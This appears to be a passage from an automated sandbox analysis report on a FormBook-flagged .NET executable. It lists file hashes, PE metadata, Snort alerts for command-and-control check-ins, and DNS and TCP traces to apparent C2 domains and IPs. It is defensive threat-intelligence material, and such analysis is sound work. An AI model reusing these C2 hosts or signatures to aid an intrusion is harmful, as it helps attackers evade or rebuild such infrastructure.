                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        www.pyithuhluttaw.netoewvlm9yhw.exeGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        olG7GnXKKT.exeGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        ORDER 200VPS.xlsxGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        JUN14 OUTSTANDING CONTRACT ORDER-01.xlsxGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        bbZdhGxjJW.exeGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        GoRnrfZlAG.exeGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        bin.exeGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        Contract RFQ01.xlsxGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        O64Hou5qAF.exeGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        feAfWrgHcX.exeGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        6d56768e_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        5PthEm83NG.exeGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        WGv1KTwWP5.exeGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        lFfDzzZYTl.exeGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        o52k2obPCG.exeGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        q3uHPdoxWP.exeGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        NMpDBwHJP8.exeGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        1ucvVfbHnD.exeGet hashmaliciousBrowse
                                        • 103.91.67.83
                                        pumYguna1i.exeGet hashmaliciousBrowse
                                        • 103.91.67.83

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        AMAZON-AESUS6dAzFehHE6.docGet hashmaliciousBrowse
                                        • 23.21.136.132
                                        vcufsCgeP2.docGet hashmaliciousBrowse
                                        • 50.16.235.219
                                        OJYNvmFRjrGet hashmaliciousBrowse
                                        • 54.208.150.10
                                        0803_0212424605.docGet hashmaliciousBrowse
                                        • 54.225.219.20
                                        niKcsf1qRyGet hashmaliciousBrowse
                                        • 54.132.161.17
                                        uMWZeUs5ZUGet hashmaliciousBrowse
                                        • 52.207.174.69
                                        PaymentAdvice.exeGet hashmaliciousBrowse
                                        • 3.223.115.185
                                        INV NO-1820000514 USD 270,294.pdf.exeGet hashmaliciousBrowse
                                        • 198.178.114.55
                                        Document.exeGet hashmaliciousBrowse
                                        • 50.16.238.218
                                        rL3Wx4zKD4.exeGet hashmaliciousBrowse
                                        • 54.242.144.184
                                        ORDER_0009_PDF.exeGet hashmaliciousBrowse
                                        • 52.20.84.62
                                        Click_me_to_install_SnapTube_tube_apkpure_dl.apkGet hashmaliciousBrowse
                                        • 3.226.20.171
                                        bestie.exeGet hashmaliciousBrowse
                                        • 3.223.115.185
                                        LnjgWbwSinGet hashmaliciousBrowse
                                        • 54.62.172.14
                                        8Z9DxqJIfNGet hashmaliciousBrowse
                                        • 54.40.250.85
                                        3etkq3iOPQGet hashmaliciousBrowse
                                        • 54.243.89.62
                                        yuwxgoZIFLndvl.dllGet hashmaliciousBrowse
                                        • 54.243.175.83
                                        SKGMC38758347_Aztrade azerbaycan urun teklifi.exeGet hashmaliciousBrowse
                                        • 35.169.40.107
                                        SGKCM20217566748_Federighi Turkiye Oferta Term#U00e9k .exeGet hashmaliciousBrowse
                                        • 35.169.40.107
                                        PO_0008.exeGet hashmaliciousBrowse
                                        • 52.20.84.62
                                        SQUARESPACEUSPO64259,pdf.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        PO_0008.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        Scan#0068-46c3365.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        Payment.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        auhToVTQTs.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        doc783748934334 PDF.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        Order Signed PEARLTECH contract and PO.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        TiJdUtcaWz.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        n9qwhaMVcs.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        E51BZ4gBRo.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        Order-CNS Amura Precision Co., Ltd 9A210118KR.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        Instruction copy.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        00928377320212607_pdf.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        2N1tt5eaCnGet hashmaliciousBrowse
                                        • 142.202.19.59
                                        MtYE4LZNQy.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        wREFu91LXZ.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        Orden de compra cotizacion.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        Inv_7623980.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        Ever Brilliant scan.xlsxGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        SMdWrQW0nH.exeGet hashmaliciousBrowse
                                        • 198.185.159.144

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JFBlvEr5H9.exe.log
                                        Process:C:\Users\user\Desktop\JFBlvEr5H9.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.015277955515814
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:JFBlvEr5H9.exe
                                        File size:1336832
                                        MD5:214b1ddf045e4d6fdd73a5c8788d2adc
                                        SHA1:8bb7c462fb649d16edb98ab526df8475a329cc71
                                        SHA256:d8e25ce44c46057985a0467adcf4fc12d8beac599e3031f6674fd1e01988267e
                                        SHA512:781fff07edcb65ec4c77c80f20a6c6aa658f4679c411654abcdc1233f19cea170b47ebb5a4227618459482f32462af12188a7cb870bd3eb347696485bb530e3c
                                        SSDEEP:24576:JvvbQF4jajOm9u+d7bs6IpQf4DMqMuulZcjLsq3ut:FbQOmi0Zbwp3DlFu
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.a..............P..p............... ........@.. ....................................@................................

                                        File Icon

                                        Icon Hash:f0c2a07179b396e8

                                        Static PE Info

                                        General

                                        Entrypoint:0x508fca
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x61094CD4 [Tue Aug 3 14:04:04 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x108f780x4f.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x10a0000x3f0a0.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x14a0000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x106fd00x107000False0.60181685183data6.91186053545IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc0x10a0000x3f0a00x3f200False0.744016862624data7.06553974349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x14a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0x10a1e00x103e6PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                        RT_ICON0x11a5d80x10318PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                        RT_ICON0x12a9000x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                        RT_ICON0x13b1380x94a8data
                                        RT_ICON0x1445f00x25a8data
                                        RT_ICON0x146ba80x10a8data
                                        RT_ICON0x147c600x988data
                                        RT_ICON0x1485f80x468GLS_BINARY_LSB_FIRST
                                        RT_GROUP_ICON0x148a700x76data
                                        RT_VERSION0x148af80x3a8data
                                        RT_MANIFEST0x148eb00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Version Infos

                                        DescriptionData
                                        Translation0x0000 0x04b0
                                        LegalCopyrightCopyright Bloodknight Studios, Slayin
                                        Assembly Version1.0.0.9
                                        InternalNameTOKENSTATISTI.exe
                                        FileVersion1.0.0.9
                                        CompanyNameBloodknight Studios
                                        LegalTrademarks
                                        CommentsCharacter Stat Calc
                                        ProductNameStatCalc
                                        ProductVersion1.0.0.9
                                        FileDescriptionAstonia Calc
                                        OriginalFilenameTOKENSTATISTI.exe

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        08/03/21-18:14:43.211032TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.552.20.84.62
                                        08/03/21-18:14:43.211032TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.552.20.84.62
                                        08/03/21-18:14:43.211032TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.552.20.84.62
                                        08/03/21-18:14:43.983733ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8
                                        08/03/21-18:14:53.810308TCP1201ATTACK-RESPONSES 403 Forbidden804975334.98.99.30192.168.2.5

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Aug 3, 2021 18:14:15.864660025 CEST4974980192.168.2.5103.91.67.83
                                        Aug 3, 2021 18:14:18.867249966 CEST4974980192.168.2.5103.91.67.83
                                        Aug 3, 2021 18:14:24.883095980 CEST4974980192.168.2.5103.91.67.83
                                        Aug 3, 2021 18:14:38.602391005 CEST4975080192.168.2.5103.91.67.83
                                        Aug 3, 2021 18:14:41.603399992 CEST4975080192.168.2.5103.91.67.83
                                        Aug 3, 2021 18:14:43.072798967 CEST4975180192.168.2.552.20.84.62
                                        Aug 3, 2021 18:14:43.210680008 CEST804975152.20.84.62192.168.2.5
                                        Aug 3, 2021 18:14:43.210855007 CEST4975180192.168.2.552.20.84.62
                                        Aug 3, 2021 18:14:43.211031914 CEST4975180192.168.2.552.20.84.62
                                        Aug 3, 2021 18:14:43.349118948 CEST804975152.20.84.62192.168.2.5
                                        Aug 3, 2021 18:14:43.349148989 CEST804975152.20.84.62192.168.2.5
                                        Aug 3, 2021 18:14:43.349170923 CEST804975152.20.84.62192.168.2.5
                                        Aug 3, 2021 18:14:43.349329948 CEST4975180192.168.2.552.20.84.62
                                        Aug 3, 2021 18:14:43.349503994 CEST4975180192.168.2.552.20.84.62
                                        Aug 3, 2021 18:14:43.486789942 CEST804975152.20.84.62192.168.2.5
                                        Aug 3, 2021 18:14:47.619605064 CEST4975080192.168.2.5103.91.67.83
                                        Aug 3, 2021 18:14:48.410933971 CEST4975280192.168.2.5198.185.159.144
                                        Aug 3, 2021 18:14:48.519268990 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.519404888 CEST4975280192.168.2.5198.185.159.144
                                        Aug 3, 2021 18:14:48.519578934 CEST4975280192.168.2.5198.185.159.144
                                        Aug 3, 2021 18:14:48.627137899 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.629916906 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.629944086 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.629960060 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.629973888 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.629988909 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.630004883 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.630021095 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.630037069 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.630058050 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.630080938 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.630085945 CEST4975280192.168.2.5198.185.159.144
                                        Aug 3, 2021 18:14:48.630215883 CEST4975280192.168.2.5198.185.159.144
                                        Aug 3, 2021 18:14:48.630364895 CEST4975280192.168.2.5198.185.159.144
                                        Aug 3, 2021 18:14:48.737709045 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.737737894 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.737751007 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.737766981 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.737786055 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.737803936 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.737822056 CEST4975280192.168.2.5198.185.159.144
                                        Aug 3, 2021 18:14:48.737855911 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.737873077 CEST8049752198.185.159.144192.168.2.5
                                        Aug 3, 2021 18:14:48.737879992 CEST4975280192.168.2.5198.185.159.144
                                        Aug 3, 2021 18:14:48.737906933 CEST4975280192.168.2.5198.185.159.144

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Aug 3, 2021 18:12:36.874536991 CEST6217653192.168.2.58.8.8.8
                                        Aug 3, 2021 18:12:36.907955885 CEST53621768.8.8.8192.168.2.5
                                        Aug 3, 2021 18:12:37.611191034 CEST5959653192.168.2.58.8.8.8
                                        Aug 3, 2021 18:12:37.636183023 CEST53595968.8.8.8192.168.2.5
                                        Aug 3, 2021 18:12:38.324131012 CEST6529653192.168.2.58.8.8.8
                                        Aug 3, 2021 18:12:38.357652903 CEST53652968.8.8.8192.168.2.5
                                        Aug 3, 2021 18:12:41.037869930 CEST6318353192.168.2.58.8.8.8
                                        Aug 3, 2021 18:12:41.065237999 CEST53631838.8.8.8192.168.2.5
                                        Aug 3, 2021 18:12:41.927155018 CEST6015153192.168.2.58.8.8.8
                                        Aug 3, 2021 18:12:41.955626965 CEST53601518.8.8.8192.168.2.5
                                        Aug 3, 2021 18:12:43.066862106 CEST5696953192.168.2.58.8.8.8
                                        Aug 3, 2021 18:12:43.091891050 CEST53569698.8.8.8192.168.2.5
                                        Aug 3, 2021 18:12:44.414567947 CEST5516153192.168.2.58.8.8.8
                                        Aug 3, 2021 18:12:44.447189093 CEST53551618.8.8.8192.168.2.5
                                        Aug 3, 2021 18:12:46.177306890 CEST5475753192.168.2.58.8.8.8
                                        Aug 3, 2021 18:12:46.202285051 CEST53547578.8.8.8192.168.2.5
                                        Aug 3, 2021 18:12:47.283232927 CEST4999253192.168.2.58.8.8.8
                                        Aug 3, 2021 18:12:47.311603069 CEST53499928.8.8.8192.168.2.5
                                        Aug 3, 2021 18:12:48.565373898 CEST6007553192.168.2.58.8.8.8
                                        Aug 3, 2021 18:12:48.590540886 CEST53600758.8.8.8192.168.2.5
                                        Aug 3, 2021 18:13:00.201102018 CEST5501653192.168.2.58.8.8.8
                                        Aug 3, 2021 18:13:00.262466908 CEST53550168.8.8.8192.168.2.5
                                        Aug 3, 2021 18:13:07.205723047 CEST6434553192.168.2.58.8.8.8
                                        Aug 3, 2021 18:13:07.246634960 CEST53643458.8.8.8192.168.2.5
                                        Aug 3, 2021 18:13:32.436744928 CEST5712853192.168.2.58.8.8.8
                                        Aug 3, 2021 18:13:32.473840952 CEST53571288.8.8.8192.168.2.5
                                        Aug 3, 2021 18:13:32.496150017 CEST5479153192.168.2.58.8.8.8
                                        Aug 3, 2021 18:13:32.565336943 CEST53547918.8.8.8192.168.2.5
                                        Aug 3, 2021 18:13:33.250998974 CEST5046353192.168.2.58.8.8.8
                                        Aug 3, 2021 18:13:33.288120031 CEST53504638.8.8.8192.168.2.5
                                        Aug 3, 2021 18:13:33.971704006 CEST5039453192.168.2.58.8.8.8
                                        Aug 3, 2021 18:13:34.003304958 CEST53503948.8.8.8192.168.2.5
                                        Aug 3, 2021 18:13:34.312916994 CEST5853053192.168.2.58.8.8.8
                                        Aug 3, 2021 18:13:34.365468025 CEST53585308.8.8.8192.168.2.5
                                        Aug 3, 2021 18:13:34.519829035 CEST5381353192.168.2.58.8.8.8
                                        Aug 3, 2021 18:13:34.556792974 CEST53538138.8.8.8192.168.2.5
                                        Aug 3, 2021 18:13:35.006221056 CEST6373253192.168.2.58.8.8.8
                                        Aug 3, 2021 18:13:35.038491011 CEST53637328.8.8.8192.168.2.5
                                        Aug 3, 2021 18:13:35.486298084 CEST5734453192.168.2.58.8.8.8
                                        Aug 3, 2021 18:13:35.514123917 CEST53573448.8.8.8192.168.2.5
                                        Aug 3, 2021 18:13:36.505542994 CEST5445053192.168.2.58.8.8.8
                                        Aug 3, 2021 18:13:36.538245916 CEST53544508.8.8.8192.168.2.5
                                        Aug 3, 2021 18:13:38.115422964 CEST5926153192.168.2.58.8.8.8
                                        Aug 3, 2021 18:13:38.150892973 CEST53592618.8.8.8192.168.2.5
                                        Aug 3, 2021 18:13:40.147618055 CEST5715153192.168.2.58.8.8.8
                                        Aug 3, 2021 18:13:40.183672905 CEST53571518.8.8.8192.168.2.5
                                        Aug 3, 2021 18:13:40.675544977 CEST5941353192.168.2.58.8.8.8
                                        Aug 3, 2021 18:13:40.711060047 CEST53594138.8.8.8192.168.2.5
                                        Aug 3, 2021 18:13:43.998931885 CEST6051653192.168.2.58.8.8.8
                                        Aug 3, 2021 18:13:44.037178993 CEST53605168.8.8.8192.168.2.5
                                        Aug 3, 2021 18:13:52.419919968 CEST5164953192.168.2.58.8.8.8
                                        Aug 3, 2021 18:13:52.453655958 CEST53516498.8.8.8192.168.2.5
                                        Aug 3, 2021 18:14:12.909081936 CEST6508653192.168.2.58.8.8.8
                                        Aug 3, 2021 18:14:12.949733973 CEST53650868.8.8.8192.168.2.5
                                        Aug 3, 2021 18:14:13.337337971 CEST5643253192.168.2.58.8.8.8
                                        Aug 3, 2021 18:14:13.381405115 CEST53564328.8.8.8192.168.2.5
                                        Aug 3, 2021 18:14:15.805944920 CEST5292953192.168.2.58.8.8.8
                                        Aug 3, 2021 18:14:15.859282017 CEST53529298.8.8.8192.168.2.5
                                        Aug 3, 2021 18:14:38.531346083 CEST6431753192.168.2.58.8.8.8
                                        Aug 3, 2021 18:14:38.569047928 CEST53643178.8.8.8192.168.2.5
                                        Aug 3, 2021 18:14:41.940502882 CEST6100453192.168.2.58.8.8.8
                                        Aug 3, 2021 18:14:42.947648048 CEST6100453192.168.2.58.8.8.8
                                        Aug 3, 2021 18:14:43.071280003 CEST53610048.8.8.8192.168.2.5
                                        Aug 3, 2021 18:14:43.983611107 CEST53610048.8.8.8192.168.2.5
                                        Aug 3, 2021 18:14:48.365482092 CEST5689553192.168.2.58.8.8.8
                                        Aug 3, 2021 18:14:48.409579039 CEST53568958.8.8.8192.168.2.5
                                        Aug 3, 2021 18:14:53.637063980 CEST6237253192.168.2.58.8.8.8
                                        Aug 3, 2021 18:14:53.678287029 CEST53623728.8.8.8192.168.2.5

                                        ICMP Packets

                                        TimestampSource IPDest IPChecksumCodeType
                                        Aug 3, 2021 18:14:43.983732939 CEST192.168.2.58.8.8.8cffc(Port unreachable)Destination Unreachable

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Aug 3, 2021 18:14:15.805944920 CEST192.168.2.58.8.8.80x9c12Standard query (0)www.pyithuhluttaw.netA (IP address)IN (0x0001)
                                        Aug 3, 2021 18:14:38.531346083 CEST192.168.2.58.8.8.80xa90fStandard query (0)www.pyithuhluttaw.netA (IP address)IN (0x0001)
                                        Aug 3, 2021 18:14:41.940502882 CEST192.168.2.58.8.8.80xd5faStandard query (0)www.aideliveryrobot.comA (IP address)IN (0x0001)
                                        Aug 3, 2021 18:14:42.947648048 CEST192.168.2.58.8.8.80xd5faStandard query (0)www.aideliveryrobot.comA (IP address)IN (0x0001)
                                        Aug 3, 2021 18:14:48.365482092 CEST192.168.2.58.8.8.80x2079Standard query (0)www.anewdistraction.comA (IP address)IN (0x0001)
                                        Aug 3, 2021 18:14:53.637063980 CEST192.168.2.58.8.8.80xff3Standard query (0)www.advancedaccessapplications.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Aug 3, 2021 18:14:15.859282017 CEST8.8.8.8192.168.2.50x9c12No error (0)www.pyithuhluttaw.net103.91.67.83A (IP address)IN (0x0001)
                                        Aug 3, 2021 18:14:38.569047928 CEST8.8.8.8192.168.2.50xa90fNo error (0)www.pyithuhluttaw.net103.91.67.83A (IP address)IN (0x0001)
                                        Aug 3, 2021 18:14:43.071280003 CEST8.8.8.8192.168.2.50xd5faNo error (0)www.aideliveryrobot.com52.20.84.62A (IP address)IN (0x0001)
                                        Aug 3, 2021 18:14:43.983611107 CEST8.8.8.8192.168.2.50xd5faServer failure (2)www.aideliveryrobot.comnonenoneA (IP address)IN (0x0001)
                                        Aug 3, 2021 18:14:48.409579039 CEST8.8.8.8192.168.2.50x2079No error (0)www.anewdistraction.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                        Aug 3, 2021 18:14:48.409579039 CEST8.8.8.8192.168.2.50x2079No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                        Aug 3, 2021 18:14:48.409579039 CEST8.8.8.8192.168.2.50x2079No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                        Aug 3, 2021 18:14:48.409579039 CEST8.8.8.8192.168.2.50x2079No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                        Aug 3, 2021 18:14:48.409579039 CEST8.8.8.8192.168.2.50x2079No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                        Aug 3, 2021 18:14:53.678287029 CEST8.8.8.8192.168.2.50xff3No error (0)www.advancedaccessapplications.comadvancedaccessapplications.comCNAME (Canonical name)IN (0x0001)
                                        Aug 3, 2021 18:14:53.678287029 CEST8.8.8.8192.168.2.50xff3No error (0)advancedaccessapplications.com34.98.99.30A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.aideliveryrobot.com
                                        • www.anewdistraction.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
